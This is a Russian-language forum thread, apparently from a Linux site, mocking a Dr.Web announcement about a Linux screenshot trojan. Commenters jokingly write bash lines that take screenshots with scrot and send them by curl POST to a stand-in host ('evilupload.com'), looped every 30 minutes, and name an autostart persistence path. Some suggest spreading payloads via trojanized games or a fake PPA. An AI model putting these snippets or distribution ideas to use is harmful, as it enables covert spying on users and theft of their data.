Охренеть!

Такой троянецпишется на баше в три строки. Новость так новость!

и загрузку файлов сделаешь?

Ну с загрузкой файлов будет побольше строк, да. Надо будет ещё wget вызывать ☺

А чтоб установить надо root привилегии? На Слаке работает?

Надо вначале скомпилить и слинковать с нужными версиями либ.

Такой троянецпишется на баше в три строки. Новость так новость!
Ну с загрузкой файлов будет побольше строк, да. Надо будет ещё wget вызывать ☺

зачем?

#!/bin/bash
scrot /tmp/virus.png
curl -X POST -F /tmp/virus.png https://evilupload.com/upload/

Судя по описанию файлы скачиваются, а не скриншоты загружаются.

$HOME/.config/autostart/%exename%.desktop

Пользователи не DE в безопасности

Судя по описанию файлы скачиваются, а не скриншоты загружаются.

ну я чисто схематически расписал, но вообще - загружаются, -F -
это форм, просто параметр должен быть -F «image=/tmp/virus.png», а так вроде бы все верно? Отправляем ПОСТ с формой с изображением на ивилхост и там сейвимх

P.S.: А, сорри, перечитал ТС, да, тогда это просто wget -i https://evilhost/toupload.txt =)

"Дохтур веб" в своём репертуаре.

Очередной однострочник на баше, КСЖ.

curl...

Троянец для Linux делает скриншоты

Так вот как галерея пополняется.

Нужно фагов вбросить значит, чтобы этот ужас перестал поститься :}

Пока весь офис судорожно бегал по интернетам, звонил на корневые днс и искал инфу, я установил dr web на все линукс хосты. Прогнал 3х часовой тест на серверах. Антивирус нашел 3 подозрительных файла включая этот троян. Удалось отследить соединение на вражеский сервер, им оказался сайт пентагона. Ушли как минимум записи разговора глав. админа с бухгалтершой Ленкой и 2 скриншота с xchat'ом.

Хакир!

и гномеры-параноики, т.к. сабж написан на кутях

Это они так остроумно хотят склонить к покупкам их продукта?

чтобы этот ужас перестал поститься

Всем лорчанам-линуксоидам срочно поставить Доктор Веб!

Где же твой баш скрипт?!
Или только языком?

Вирос на кутэ? Серьезно?

дык на два поста ниже же.

Ненуачо, скайп же существует как-то.

Зачем делать на культях то, что можно сделать на баше?

Мне интересно как он в систему должен проникнуть.

комменты по ссылке обрадовали

такое чувство, что их сами сотруднички drweb пишут

А фреймбуфер и вайлэнд он поддерживает?

Собака ещё нужна типа

curl -F "image=@/path/to/file.jpg"

это не то, надо, чтобы он снимал, допустим раз в 30 минут и выкладывал на сервер.

Ну пока я вижу два способа

Протроянивать игры. На торрентах видел, что люди прям пердолятся и обсуждают как какой-нибудь поставить линуксовый халф лайв, которому цена чашка кофе в стиме.

Создать левое ppa под туже ubuntu. Пакеты выбрать по популярности в поисковиках к словам 'ppa'. Ну и полезную нагрузку к этим пакетам добавить.

Но низкая популярность линуксов само собой малину портит в экономическом плане, разве что для чистого фана.

while true; do scrot /tmp/virus.png && curl -X POST -F "image=@/tmp/virus.png" "https://evilupload.com/upload/"; sleep 30m; done;

в одну строку

Даже не смешно. У народа вон на главной эксплойт не работает, вот это реально проблема.

в крон зафигачить, и все.

А вот интересно. Это Др.Веб практикуется и пытается написать хоть какой-нибудь вирус для линукса?

К слову, у нас китайцы на одну тестовую виртуалку со слабым паролем закинули трояна. Он был просто статически слинкован, и не заработал, т.к. i386, а с машины была напрочь выпилен multilib, ибо там не предполагается легаси код вообще.

Но ведь не у всех стоит scrot.

Но ведь не у всех стоит scrot.

Когда-то целью троянов были все?

Это скорее полезный инструмент. Особенно оверам =)

Для Ъ

Прямо эпидемия в среде Линуксов.

Опасный троянец для ОС Linux! Спасибо за предупреждение и подробности!

теряем линукс ...

Без паники!

Сигнатура Linux.Ekoms.1 добавлена в вирусные базы, и потому этот троянец не представляет опасности для пользователей Антивируса Dr.Web для Linux.

Доктор Веб защитит все операционные системы от любых угроз!!!)))